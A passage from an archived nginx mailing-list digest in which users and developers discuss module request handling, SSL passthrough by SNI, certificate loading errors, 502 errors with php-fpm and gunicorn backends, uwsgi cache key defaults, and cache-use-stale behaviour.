Here's the diff: https://github.com/dukzcry/nginx/commit/f0af0f19ccc5e173fa4dddd3974cd05ef0b52692.diff and here's the patched tree: https://github.com/dukzcry/nginx Posted at Nginx Forum: http://forum.nginx.org/read.php?2,219069,253083#msg-253083 From mdounin at mdounin.ru Fri Sep 5 04:35:16 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Fri, 5 Sep 2014 08:35:16 +0400 Subject: terminate a connection after sending headers In-Reply-To: <526de0a4342b2fea16d15520bd9c5095.NginxMailingListEnglish@forum.nginx.org> References: <20140904011002.GX1849@mdounin.ru> <526de0a4342b2fea16d15520bd9c5095.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20140905043515.GA1634@mdounin.ru> Hello! On Thu, Sep 04, 2014 at 04:38:41PM -0400, erankor2 wrote: > Thank you very much Maxim ! this works ! > > However, I bumped into a new problem, I use 2 different types of asyncronous > operations in my code - file I/O and http requests. When I call > ngx_http_run_posted_requests from the aio callback it works well, but when I > call it from the HTTP completion callback it actually makes the request > hang. > I can see that it calls ngx_http_upstream_check_broken_connection in > r->write_event_handler(r). I guess that in this case I should let > ngx_http_run_posted_requests run from the upstream module instead of calling > it myself. > > So my questions are: > 1. Is there a simple rule that dictates when I should call > ngx_http_run_posted_requests and when I should not ? > I can work around the problem by doing something like 'if called from the > aio callback call ngx_http_run_posted_requests' otherwise, don't call, but > that doesn't feel like the correct solution. You should call ngx_http_run_posted_requests() after low-level events. That is, there is no need to call it after http-related events, as ngx_http_run_posted_requests() will be called by ngx_http_request_handler(). 
But if your own low-level events are triggered, like the timer in your code, it's your responsibility to call ngx_http_run_posted_requests() after them. > 2. A simpler solution that seems to work for me, is to call > ngx_http_run_posted_requests only when I see that r->main->count is one > (before finalize). But I don't know if that solution makes any sense - is > there any relation between these posted_requests and the request count ? No, it doesn't make sense to check r->main->count. > My understanding (before reading your reply :)) was that whenever I do > something asynchronous I must increment the count, whenever I call > finalize_request the count is decremented and once the count reaches zero > the request is terminated. So, what I'm missing is why the termination of > the request has to be deferred via posted requests - couldn't > ngx_http_terminate_request just close the request only when it sees the > count reached zero instead ? Termination on errors, which is what you are doing, isn't expected to wait for r->main->count to reach zero. It is expected to proactively stop all ongoing activity by executing cleanup handlers, and then free the request. -- Maxim Dounin http://nginx.org/ From nginx-forum at nginx.us Fri Sep 5 08:04:28 2014 From: nginx-forum at nginx.us (OzJD) Date: Fri, 05 Sep 2014 04:04:28 -0400 Subject: NGINX SSL passthrough without certificate Message-ID: <8ad21daad6465294f06b195b151abffd.NginxMailingListEnglish@forum.nginx.org> We currently have a backend server that listens for SSL requests, and (using SNI) chooses to pass them on to the correct place, or alternatively will serve the requested HTTPS. Our current configuration is slow (not painfully, just slower than we'd like), and we figured having NGINX do some of the work would speed things up. Can NGINX pass through some HTTPS requests (by domain) without modifying anything (by checking SNI in the initial packet)? Most (all?)
websites indicate that I should decode and encode the traffic (which is not possible because of cases such as https://google.com/). So ultimately, what would be ideal for us is: 1. NGINX sits on the network boundary, listening for SSL/TLS connections 2. When a new connection comes in, NGINX decides to pass on the TLS connection without touching it OR serve it as a regular HTTPS website (OR depends on domain) Lastly, is there any current way to achieve X-FORWARDED-FOR with HTTPS? I understand it can't go into the actual HTTPS request, but figured it could be sent BEFORE the HTTPS decode packet. (The receiving end would have to understand this also.) Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253088,253088#msg-253088 From luky-37 at hotmail.com Fri Sep 5 08:15:48 2014 From: luky-37 at hotmail.com (Lukas Tribus) Date: Fri, 5 Sep 2014 10:15:48 +0200 Subject: NGINX SSL passthrough without certificate In-Reply-To: <8ad21daad6465294f06b195b151abffd.NginxMailingListEnglish@forum.nginx.org> References: <8ad21daad6465294f06b195b151abffd.NginxMailingListEnglish@forum.nginx.org> Message-ID: Hi, > We currently have a backend server that listens for SSL requests, and (using > SNI) chooses to pass them on to the correct place, or alternatively will > serve the requested HTTPS. > > Our current configuration is slow (not painfully, just slower than we'd > like), and we figured having NGINX do some of the work would speed things > up. > > Can NGINX pass through some HTTPS requests (by domain) without modifying > anything (by checking SNI in the initial packet)? Most (all?) websites > indicate that I should decode and encode the traffic (which is not be > possible because of cases such as https://google.com/). > > So ultimately, what would be ideal for us is: > 1. NGINX sits on network boundary, listening for SSL/TLS connections > 2.
When a new connection comes in, NGINX decides to pass on the TLS > connection without touching it OR serve it as a regular HTTPS website (OR > depends on domain) > > Lastly, is there any current way to achieve X-FORWARDED-FOR with HTTPS? I > understand it can't go into the actual HTTPS request, but figured it could > be sent BEFORE the HTTPS decode packet. (the receiving end would have to > understand this also) For all those things, haproxy is way more adequate. Regards, Lukas From nginx-forum at nginx.us Fri Sep 5 09:43:02 2014 From: nginx-forum at nginx.us (OzJD) Date: Fri, 05 Sep 2014 05:43:02 -0400 Subject: NGINX SSL passthrough without certificate In-Reply-To: References: Message-ID: <9b6cd1679fbd01048ad5aa077bc03ed0.NginxMailingListEnglish@forum.nginx.org> Hi Lukas, While HAProxy is able to do some of those things (not sure about X-FORWARDED-FOR workarounds?), I'd still prefer to use NGINX where possible (for other reasons, such as PageSpeed support, etc) Is NGINX able to do any of the things mentioned in the question? Specifically, can it sort by SNI hostname without becoming an SSL endpoint? If not, is there a reason why? (has it been decided by the community that it's not a good idea, or it just hasn't been developed?) I've seen a few similar questions around, but no definitive answer. Thanks, OzJD Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253088,253090#msg-253090 From luky-37 at hotmail.com Fri Sep 5 10:22:17 2014 From: luky-37 at hotmail.com (Lukas Tribus) Date: Fri, 5 Sep 2014 12:22:17 +0200 Subject: NGINX SSL passthrough without certificate In-Reply-To: <9b6cd1679fbd01048ad5aa077bc03ed0.NginxMailingListEnglish@forum.nginx.org> References: , <9b6cd1679fbd01048ad5aa077bc03ed0.NginxMailingListEnglish@forum.nginx.org> Message-ID: Hi, > Hi Lukas, > > While HAProxy is able to do some of those things (not sure about > X-FORWARDED-FOR workarounds?) Yes, haproxy supports and pushes the PROXY protocol for this exact reason. 
> I'd still prefer to use NGINX where possible > (for other reasons, such as PageSpeed support, etc) Well, you can't use PageSpeed if you forward SSL-encrypted TCP traffic, can you? Perhaps you need a combination of the two? For example, SNI-based routing on a first (HAProxy) layer, passing the SSL-encrypted traffic either to nginx, for decryption/PageSpeed, etc., or directly to a backend (based on SNI). > Is NGINX able to do any of the things mentioned in the question? I don't think so, mainly because nginx' focus is http/https, not TCP forwarding. Regards, Lukas From nginx-forum at nginx.us Fri Sep 5 11:54:05 2014 From: nginx-forum at nginx.us (OzJD) Date: Fri, 05 Sep 2014 07:54:05 -0400 Subject: NGINX SSL passthrough without certificate In-Reply-To: References: Message-ID: Lukas, I think you're right. The combination of the three may be optimal at this time. I'll see what I come up with - I hadn't heard of the PROXY protocol before (was thinking of something similar though). That's made my life plenty easier!
Thanks mate :-) Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253088,253095#msg-253095 From nginx-forum at nginx.us Fri Sep 5 14:11:02 2014 From: nginx-forum at nginx.us (vk1dadhich) Date: Fri, 05 Sep 2014 10:11:02 -0400 Subject: urgent need help ,ssl error ; In-Reply-To: References: Message-ID: Hi Team, I am facing an issue regarding SSL in nginx; find below the error logs: 2014/09/05 19:23:36 [emerg] 18774#0: SSL_CTX_use_PrivateKey_file("/etc/nginx/ssl/server.crt") failed (SSL: error:0906D06C:PEM routines:PEM_read_bio:no start line error:140B0009:SSL routines:SSL_CTX_use_PrivateKey_file:PEM lib) 2014/09/05 19:23:36 [emerg] 18775#0: SSL_CTX_use_PrivateKey_file("/etc/nginx/ssl/server.crt") failed (SSL: error:0906D06C:PEM routines:PEM_read_bio:no start line error:140B0009:SSL routines:SSL_CTX_use_PrivateKey_file:PEM lib) 2014/09/05 19:26:51 [emerg] 18977#0: SSL_CTX_use_PrivateKey_file("/etc/nginx/ssl/server.crt") failed (SSL: error:0906D06C:PEM routines:PEM_read_bio:no start line error:140B0009:SSL routines:SSL_CTX_use_PrivateKey_file:PEM lib) 2014/09/05 19:26:51 [emerg] 18978#0: SSL_CTX_use_PrivateKey_file("/etc/nginx/ssl/server.crt") failed (SSL: error:0906D06C:PEM routines:PEM_read_bio:no start line error:140B0009:SSL routines:SSL_CTX_use_PrivateKey_file:PEM lib) I have googled but can't resolve it; only you guys can help me, it's very urgent. Thanks & Regards Vijay kr vk1dadhich at gmail.com Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253088,253098#msg-253098 From nginx-forum at nginx.us Fri Sep 5 14:13:49 2014 From: nginx-forum at nginx.us (vk1dadhich) Date: Fri, 05 Sep 2014 10:13:49 -0400 Subject: urgent need help ,ssl error ; In-Reply-To: References: Message-ID: One most important thing: our site had been working with https for 2 months, but after configuring sftp with openssl the problem appeared. I restored the old sshd_config settings, exactly as they were when it worked, but am still facing the issue.
Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253088,253099#msg-253099 From miguelmclara at gmail.com Fri Sep 5 14:14:47 2014 From: miguelmclara at gmail.com (Miguel Clara) Date: Fri, 5 Sep 2014 15:14:47 +0100 Subject: urgent need help ,ssl error ; In-Reply-To: References: Message-ID: Seems like the "/etc/nginx/ssl/server.crt" content is not correct ("no start line" error); maybe a bad copy-paste? Melhores Cumprimentos // Best Regards ----------------------------------------------- *Miguel Clara* *IT - Sys Admin & Developer* *E-mail: *miguelmclara at gmail.com www.linkedin.com/in/miguelmclara/ On Fri, Sep 5, 2014 at 3:11 PM, vk1dadhich wrote: > Hi Team, > > I am facing a issue regarding the ssl in nginx , find below the error logs > : > > > 2014/09/05 19:23:36 [emerg] 18774#0: > SSL_CTX_use_PrivateKey_file("/etc/nginx/ssl/server.crt") failed (SSL: > error:0906D06C:PEM routines:PEM_read_bio:no start line error:140B0009:SSL > routines:SSL_CTX_use_PrivateKey_file:PEM lib) > 2014/09/05 19:23:36 [emerg] 18775#0: > SSL_CTX_use_PrivateKey_file("/etc/nginx/ssl/server.crt") failed (SSL: > error:0906D06C:PEM routines:PEM_read_bio:no start line error:140B0009:SSL > routines:SSL_CTX_use_PrivateKey_file:PEM lib) > 2014/09/05 19:26:51 [emerg] 18977#0: > SSL_CTX_use_PrivateKey_file("/etc/nginx/ssl/server.crt") failed (SSL: > error:0906D06C:PEM routines:PEM_read_bio:no start line error:140B0009:SSL > routines:SSL_CTX_use_PrivateKey_file:PEM lib) > 2014/09/05 19:26:51 [emerg] 18978#0: > SSL_CTX_use_PrivateKey_file("/etc/nginx/ssl/server.crt") failed (SSL: > error:0906D06C:PEM routines:PEM_read_bio:no start line error:140B0009:SSL > routines:SSL_CTX_use_PrivateKey_file:PEM lib) > > had donethe google but can't resolve, only you guies can help me, its very > urgent.
> > Thank & Regards > Vijay kr > vk1dadhich at gmail.com > > Posted at Nginx Forum: > http://forum.nginx.org/read.php?2,253088,253098#msg-253098 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: linkedin.png Type: image/png Size: 655 bytes Desc: not available URL: From nginx-forum at nginx.us Fri Sep 5 21:49:08 2014 From: nginx-forum at nginx.us (useopenid) Date: Fri, 05 Sep 2014 17:49:08 -0400 Subject: nginx mail proxy - dovecot ssl backend In-Reply-To: <281e9d10b14cad10fa7ede612c0d25ac.NginxMailingListEnglish@forum.nginx.org> References: <4ECFFD1E.2030002@yahoo.com.br> <9488c17d7cf4ee5a292ad097b1740294.NginxMailingListEnglish@forum.nginx.org> <42c203a0a7a1711d61fff1e4118ab921.NginxMailingListEnglish@forum.nginx.org> <4784f9fe36b38297a526f1ba7537a4a7.NginxMailingListEnglish@forum.nginx.org> <01877f9ad2f754ce06c078535332654b.NginxMailingListEnglish@forum.nginx.org> <281e9d10b14cad10fa7ede612c0d25ac.NginxMailingListEnglish@forum.nginx.org> Message-ID: <813b313b58edd13fb4d5bfd3e8ec93b3.NginxMailingListEnglish@forum.nginx.org> Thanks! I setup stunnel in the interim, but this will be more efficient. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,219069,253106#msg-253106 From steve at greengecko.co.nz Sun Sep 7 00:52:43 2014 From: steve at greengecko.co.nz (Steve Holdoway) Date: Sun, 07 Sep 2014 12:52:43 +1200 Subject: urgent need help ,ssl error ; In-Reply-To: References: Message-ID: <1410051163.3094.20.camel@steve-new> "no start line error" is pretty specific. The first line with any text on should read -----BEGIN CERTIFICATE----- with 5 dashes before and after the text. 
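Notably, the error log shows the private-key loader (SSL_CTX_use_PrivateKey_file) being handed server.crt, which suggests ssl_certificate_key may be pointing at the certificate file. A minimal correct layout, for comparison (the .key path and server_name are assumptions, not from the original post):

```nginx
server {
    listen 443 ssl;
    server_name example.com;                        # placeholder

    ssl_certificate     /etc/nginx/ssl/server.crt;  # certificate (plus chain)
    ssl_certificate_key /etc/nginx/ssl/server.key;  # private key, NOT the .crt
}
```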
On Fri, 2014-09-05 at 10:11 -0400, vk1dadhich wrote: > Hi Team, > > I am facing a issue regarding the ssl in nginx , find below the error logs > : > > > 2014/09/05 19:23:36 [emerg] 18774#0: > SSL_CTX_use_PrivateKey_file("/etc/nginx/ssl/server.crt") failed (SSL: > error:0906D06C:PEM routines:PEM_read_bio:no start line error:140B0009:SSL > routines:SSL_CTX_use_PrivateKey_file:PEM lib) > 2014/09/05 19:23:36 [emerg] 18775#0: > SSL_CTX_use_PrivateKey_file("/etc/nginx/ssl/server.crt") failed (SSL: > error:0906D06C:PEM routines:PEM_read_bio:no start line error:140B0009:SSL > routines:SSL_CTX_use_PrivateKey_file:PEM lib) > 2014/09/05 19:26:51 [emerg] 18977#0: > SSL_CTX_use_PrivateKey_file("/etc/nginx/ssl/server.crt") failed (SSL: > error:0906D06C:PEM routines:PEM_read_bio:no start line error:140B0009:SSL > routines:SSL_CTX_use_PrivateKey_file:PEM lib) > 2014/09/05 19:26:51 [emerg] 18978#0: > SSL_CTX_use_PrivateKey_file("/etc/nginx/ssl/server.crt") failed (SSL: > error:0906D06C:PEM routines:PEM_read_bio:no start line error:140B0009:SSL > routines:SSL_CTX_use_PrivateKey_file:PEM lib) > > had donethe google but can't resolve, only you guies can help me, its very > urgent. > > Thank & Regards > Vijay kr > vk1dadhich at gmail.com > > Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253088,253098#msg-253098 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx -- Steve Holdoway BSc(Hons) MIITP http://www.greengecko.co.nz Linkedin: http://www.linkedin.com/in/steveholdoway Skype: sholdowa From nginx-forum at nginx.us Sun Sep 7 20:49:31 2014 From: nginx-forum at nginx.us (erankor2) Date: Sun, 07 Sep 2014 16:49:31 -0400 Subject: terminate a connection after sending headers In-Reply-To: <20140905043515.GA1634@mdounin.ru> References: <20140905043515.GA1634@mdounin.ru> Message-ID: <9a5c4332f0c890f020feaf9d53820fb2.NginxMailingListEnglish@forum.nginx.org> Thank you very much, Maxim. 
I implemented the solution as you advised. Eran Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253006,253116#msg-253116 From nginx-forum at nginx.us Sun Sep 7 23:15:46 2014 From: nginx-forum at nginx.us (nfn) Date: Sun, 07 Sep 2014 19:15:46 -0400 Subject: 502 errors with nginx and php5-fpm Message-ID: Hi, I'm getting lots of 502 errors but my nginx logs and php logs don't give me information that can help me identify the problem. I only have the 502 errors in the access logs. I don't see any errors in the error.log or php logs. First, how can I configure nginx and php so I can get more information about the problem? I already increased fastcgi buffers and php memory limit without success. Some help would be appreciated. Thanks Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253117,253117#msg-253117 From mdounin at mdounin.ru Mon Sep 8 11:50:58 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 8 Sep 2014 15:50:58 +0400 Subject: 502 errors with nginx and php5-fpm In-Reply-To: References: Message-ID: <20140908115057.GA59236@mdounin.ru> Hello! On Sun, Sep 07, 2014 at 07:15:46PM -0400, nfn wrote: > Hi, > > I'm getting lots of 502 errors but my nginx logs and php logs don't give me > information that can help me identify the problem. > > I only have the 502 errors in the access logs. I don't see any errors in the > error.log or php logs. > > Fist, how can I configure nginx and php so I can get more information about > the problem? If the 502 error is returned by nginx, the reason should be logged to the error log, at the "error" level or higher. If you don't see anything in your error log, this may mean one of the following: - The error was returned by the backend. (Highly unlikely in case of php-fpm, AFAIK.) - You are looking into the wrong log, or your error log is configured to only log errors with higher levels. See http://nginx.org/r/error_log for details on configuring error logging.
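In configuration terms, that corresponds to something like the following (paths and levels here are illustrative, not from the original post):

```nginx
# Log at "warn" severity and above; "error" would be the usual minimum
# to see the reason for a 502 from a backend.
error_log /var/log/nginx/error.log warn;

# A lower threshold such as "info" logs more detail while diagnosing;
# "debug" is the most verbose and requires nginx built with --with-debug.
# error_log /var/log/nginx/error.log info;
```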
It is also possible to configure nginx to write debugging logs, with all low-level information about request processing, see here: http://nginx.org/en/docs/debugging_log.html (This still uses error_log though.) -- Maxim Dounin http://nginx.org/ From nginx-forum at nginx.us Mon Sep 8 21:01:07 2014 From: nginx-forum at nginx.us (xkillac4) Date: Mon, 08 Sep 2014 17:01:07 -0400 Subject: 502 errors with nginx+gunicorn Message-ID: Hi all, I am sending large post request to gunicorn/django behind nginx. If gunicorn responds and closes the connection before nginx has finished sending the large request body, it causes nginx to issue a 502 Bad Gateway response instead of the app server's response. This scenario happens e.g., if the endpoint requires authentication but the request is not authenticated (401 or 403). More info here: https://github.com/benoitc/gunicorn/issues/872 As noted in the linked gunicorn issue, I've worked around this by making sure django waits for the entire request to come in before responding. Not sure if this is something you guys are interested in looking into, but thought I'd share. Thanks, Colin Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253135,253135#msg-253135 From mdounin at mdounin.ru Tue Sep 9 02:55:17 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 9 Sep 2014 06:55:17 +0400 Subject: 502 errors with nginx+gunicorn In-Reply-To: References: Message-ID: <20140909025517.GN59236@mdounin.ru> Hello! On Mon, Sep 08, 2014 at 05:01:07PM -0400, xkillac4 wrote: > Hi all, > > I am sending large post request to gunicorn/django behind nginx. If > gunicorn responds and closes the connection before nginx has finished > sending the large request body, it causes nginx to issue a 502 Bad Gateway > response instead of the app server's response. This scenario happens e.g., > if the endpoint requires authentication but the request is not authenticated > (401 or 403). 
> > More info here: https://github.com/benoitc/gunicorn/issues/872 > > As noted in the linked gunicorn issue, I've worked around this by making > sure django waits for the entire request to come in before responding. Not > sure if this is something you guys are interested in looking into, but > thought I'd share. This looks like a classic problem, solved with lingering close in the http world (see [1] for nginx's own implementation details). There isn't much nginx can do in this case - it's something to be resolved in the backend software. [1] http://nginx.org/r/lingering_close -- Maxim Dounin http://nginx.org/ From lists at ruby-forum.com Tue Sep 9 17:51:43 2014 From: lists at ruby-forum.com (Ugur Engin) Date: Tue, 09 Sep 2014 19:51:43 +0200 Subject: video metadata parameters Message-ID: <8de8f8fe42289ad2db7090805a1ca8e1@ruby-forum.com> Hi, Is it possible to get metadata information from an mp4 file, without using a third-party player, while streaming a video file? I need the metadata parameters so that I can use them in our code while a video is playing, after the first request. Thank you. -- Posted via http://www.ruby-forum.com/. From nginx-forum at nginx.us Tue Sep 9 18:25:15 2014 From: nginx-forum at nginx.us (gthb) Date: Tue, 09 Sep 2014 14:25:15 -0400 Subject: Change blank uwsgi_cache_key default, or log warning Message-ID: Hello, Because uwsgi_cache_key has no default value (or rather, has the empty string as its default value), a configuration with uwsgi_cache set but uwsgi_cache_key not set behaves in a way that is very unlikely to be desired: Nginx caches the first publicly cacheable response it gets from upstream (for any request), and serves that cached response to *any* request mapping to the same location.
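A configuration that falls into this trap looks innocuous (zone name, cache path and socket are placeholders for illustration):

```nginx
uwsgi_cache_path /var/cache/nginx/uwsgi keys_zone=app_cache:10m;

server {
    location / {
        include uwsgi_params;
        uwsgi_pass unix:/tmp/uwsgi.sock;   # placeholder backend
        uwsgi_cache app_cache;
        # uwsgi_cache_key is not set, so the key is the empty string and
        # every request in this location shares a single cache entry.
        # An explicit key avoids this:
        # uwsgi_cache_key $scheme$host$request_uri;
    }
}
```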
The internals of that can be seen in the debug log, where the cache key is empty for all requests: 2014/09/09 17:41:02 [debug] 91211#0: *13 http cache key: "" This is in contrast to a configuration with proxy_cache enabled but proxy_cache_key not set; that behaves OK because proxy_cache_key has a useful default. Because of the *general* correspondence between the http_proxy and http_uwsgi modules, it's easy to fall into this trap, defining uwsgi_cache but not uwsgi_cache_key. When that happens, and unexpected responses start coming back, the first place one looks is error.log, and there's nothing there. To get rid of this gotcha, I suggest either: 1. log a warning whenever a location/server/http block has uwsgi_cache set but no uwsgi_cache_key set. or 2. change the default value of uwsgi_cache_key to a more useful default, such as $scheme$host$request_uri, similar to proxy_cache_key (not quite the same, because the proxy_cache_key has $proxy_host in its default, and there is no corresponding $uwsgi_host). You might not want to make such a default-behavior change in a subminor release --- but as a counterargument, the current default seems quite unlikely to be relied on by anyone. Cheers, Gulli Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253149,253149#msg-253149 From jon.clayton at rackspace.com Wed Sep 10 03:15:20 2014 From: jon.clayton at rackspace.com (Jon Clayton) Date: Tue, 9 Sep 2014 22:15:20 -0500 Subject: Socket connection failures on 1.6.1~precise In-Reply-To: <540629F7.6050004@rackspace.com> References: <5405E98A.2070105@rackspace.com> <20140902191448.GP1849@mdounin.ru> <540629F7.6050004@rackspace.com> Message-ID: <540FC248.1070805@rackspace.com> Just closing the loop on this, but what appeared to be happening was that newly created nodes were not having the nginx master PID start up with a custom ulimit set in /etc/security/limits.d/. 
The workers were all fine since the worker_rlimit_nofile was set in the nginx.conf, but I was running into a separate issue that was preventing nginx from inheriting the custom ulimit setting for that master PID file. Truth be told, I never quite nailed down an exact RCA other than ensuring the nginx master PID came up with the custom ulimit setting. That would seem to indicate something was causing a spike in the number of open files for the master PID, but I can look into that separately. On 09/02/2014 03:35 PM, Jon Clayton wrote: > I did see the changelog hadn't noted many changes and running a diff > of the versions shows what you mentioned regarding the 400 bad request > handling code. I'm not necessarily stating that nginx is the problem, > but it would seem like something had changed enough to cause the > backend's backlog to fill more rapidly. > > That could be a completely bogus statement as I've been attempting to > find a way to track down exactly what backlog is being filled, but my > test of downgrading nginx back to 1.6.0 from the nginx ppa seemed to > also point at a change in nginx causing the issue since the errors did > not persist after downgrading. > > It's very possible that I'm barking up the wrong tree, but the fact > that only changing nginx versions back down to 1.6.0 from 1.6.1 > eliminated the errors seems suspicious. I'll keep digging, but I'm > open to any other suggestions. > > > On 09/02/2014 02:14 PM, Maxim Dounin wrote: >> Hello! >> >> On Tue, Sep 02, 2014 at 11:00:10AM -0500, Jon Clayton wrote: >> >>> I'm trying to track down an issue that is being presented only when >>> I run >>> nginx version 1.6.1-1~precise. My nodes running 1.6.0-1~precise do not >>> display this issue, but freshly created servers are getting floods >>> of these >>> socket connection issues a couple times a day. 
>>> >>> /connect() to unix:/tmp/unicorn.sock failed (11: Resource temporarily >>> unavailable) while connecting to upstream/ >>> >>> The setup I'm working with is nginx proxying requests to a unicorn >>> socket >>> powered by a ruby app. As stated above, the error is NOT present on >>> nodes >>> running 1.6.0-1~precise, but any newly created node gets the newer >>> 1.6.1-1~precise package installed and will inevitably have that error. >>> >>> All settings from nodes running 1.6.0 appear to be the same as newly >>> created >>> nodes on 1.6.1 in terms of sysctl settings, nginx settings, and unicorn >>> settings. All package versions are the same except for nginx. When I >>> downgraded one of the newly created nodes to nginx 1.6.0 using the >>> nginx ppa >>> (ref: >>> https://launchpad.net/~nginx/+archive/ubuntu/stable), the error was not >>> present. >>> >>> Is there any advice, direction, or similar issue experienced that >>> someone >>> else might be able to help me track this down? >> Just some information: >> >> - In nginx itself, the difference between 1.6.0 and 1.6.1 is fairy >> minimal. The only change affecting http is one code line added >> in the 400 Bad Request handling code >> (see http://hg.nginx.org/nginx/rev/b8188afb3bbb). >> >> - The message suggests that backend's backlog is full. This can >> easily happen on load spikes and/or if a backend is overloaded, >> and usually unrelated to the nginx itself. 
>> > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From nginx-forum at nginx.us Wed Sep 10 14:21:18 2014 From: nginx-forum at nginx.us (nanochelandro) Date: Wed, 10 Sep 2014 10:21:18 -0400 Subject: fastcgi_cache_use_stale "updating" — improvement suggestion Message-ID: <491f264a4756c72b0a2e869382026eb8.NginxMailingListEnglish@forum.nginx.org> Hello All, fastcgi_cache_use_stale is awesome, especially with the "updating" parameter. But I have a feeling that it lacks a complementary parameter (or a separate setting to tune the "updating" behaviour) that would instruct nginx to quickly return a stale cached response also on the first request (while the fastcgi app is busy doing its hard work). The currently existing behaviour is to return stale cached responses on subsequent requests only, but the first response is delayed until fastcgi finishes its job. What do you think? Thank you. My deepest regards. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253160,253160#msg-253160 From nginx-forum at nginx.us Wed Sep 10 14:22:24 2014 From: nginx-forum at nginx.us (ronlemonz) Date: Wed, 10 Sep 2014 10:22:24 -0400 Subject: Windows 2008 - logging off kills nginx Message-ID: Nginx serves pages until I log off the web server. I need to log in again and start nginx (sometimes needing to kill IIS). Thanks for any thoughts, Ron Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253161,253161#msg-253161 From nginx-forum at nginx.us Wed Sep 10 14:30:55 2014 From: nginx-forum at nginx.us (biazus) Date: Wed, 10 Sep 2014 10:30:55 -0400 Subject: wrong data in $upstream_status and $upstream_response_time Message-ID: <87718f4b7803dc7c87846f6f93bb3eb7.NginxMailingListEnglish@forum.nginx.org> Hey Guys, We have been using the latest stable Nginx version 1.6.1, and I've noticed that we might be facing a bug that was supposed to be fixed in version 1.5.11.
Bugfix: the $upstream_status variable might contain wrong data if the "proxy_cache_use_stale" or "proxy_cache_revalidate" directives were used. On MISS requests the variables "$upstream_status" and "$upstream_response_time" are eventually returning wrong data, like the example below: $upstream_status - "504, 504, 200" or even "-, 200" $upstream_response_time - "8.005, 0.242" As you can see, the data contains two or three values separated by commas, and the $upstream_response_time also contains two comma-separated time values. Does that make sense to you guys? Is it expected? Thanks in advance, Daniel Biazus Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253162,253162#msg-253162 From miguelmclara at gmail.com Wed Sep 10 15:22:30 2014 From: miguelmclara at gmail.com (Miguel Clara) Date: Wed, 10 Sep 2014 16:22:30 +0100 Subject: Windows 2008 - logging off kills nginx In-Reply-To: References: Message-ID: How are you starting nginx? On September 10, 2014 3:22:24 PM GMT+01:00, ronlemonz wrote: >Nginx serves pages until I log off the web server. I need to log in >again >and start nginx (sometimes needing to kill IIS). >Thanks for any thoughts, >Ron > >Posted at Nginx Forum: >http://forum.nginx.org/read.php?2,253161,253161#msg-253161 > >_______________________________________________ >nginx mailing list >nginx at nginx.org >http://mailman.nginx.org/mailman/listinfo/nginx -- Sent from my Android device with K-9 Mail. Please excuse my brevity. -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Wed Sep 10 16:16:34 2014 From: nginx-forum at nginx.us (ronlemonz) Date: Wed, 10 Sep 2014 12:16:34 -0400 Subject: Windows 2008 - logging off kills nginx In-Reply-To: References: Message-ID: <72bf9bbe8299a063ecd9c8e48e7981cf.NginxMailingListEnglish@forum.nginx.org> I log into the box as myself and then run a bat file which includes: c:\nginx\RunHiddenConsole.exe C:\nginx\nginx.exe ECHO Start php-cgi...
c:\nginx\RunHiddenConsole.exe C:\nginx\php-cgi-start.bat Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253161,253164#msg-253164 From mdounin at mdounin.ru Wed Sep 10 17:01:30 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Wed, 10 Sep 2014 21:01:30 +0400 Subject: =?UTF-8?Q?Re=3A_fastcgi_cache_use_stale_=22updating=22_=E2=80=94_improveme?= =?UTF-8?Q?nt_suggestion?= In-Reply-To: <491f264a4756c72b0a2e869382026eb8.NginxMailingListEnglish@forum.nginx.org> References: <491f264a4756c72b0a2e869382026eb8.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20140910170130.GR59236@mdounin.ru> Hello! On Wed, Sep 10, 2014 at 10:21:18AM -0400, nanochelandro wrote: > Hello All, > > fastcgi_cache_use_stale is awesome, especially with the "updating" parameter. > But I have a feeling that it lacks a complementary parameter (or a separate > setting to tune the "updating" behaviour) that would instruct nginx to quickly > return the stale cached response on the first request as well (while the fastcgi app is > busy doing its hard work). The currently existing behaviour is to return stale > cached responses on subsequent requests only, but the first response is delayed > until fastcgi finishes its job. > > What do you think? As of now, nginx needs a client request to be able to request a resource from a backend and to save it to the cache. That is, this behaviour is an implementation detail which isn't trivial to change. -- Maxim Dounin http://nginx.org/ From mdounin at mdounin.ru Wed Sep 10 17:03:45 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Wed, 10 Sep 2014 21:03:45 +0400 Subject: wrong data in $upstream_status and $upstream_response_time In-Reply-To: <87718f4b7803dc7c87846f6f93bb3eb7.NginxMailingListEnglish@forum.nginx.org> References: <87718f4b7803dc7c87846f6f93bb3eb7.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20140910170345.GS59236@mdounin.ru> Hello!
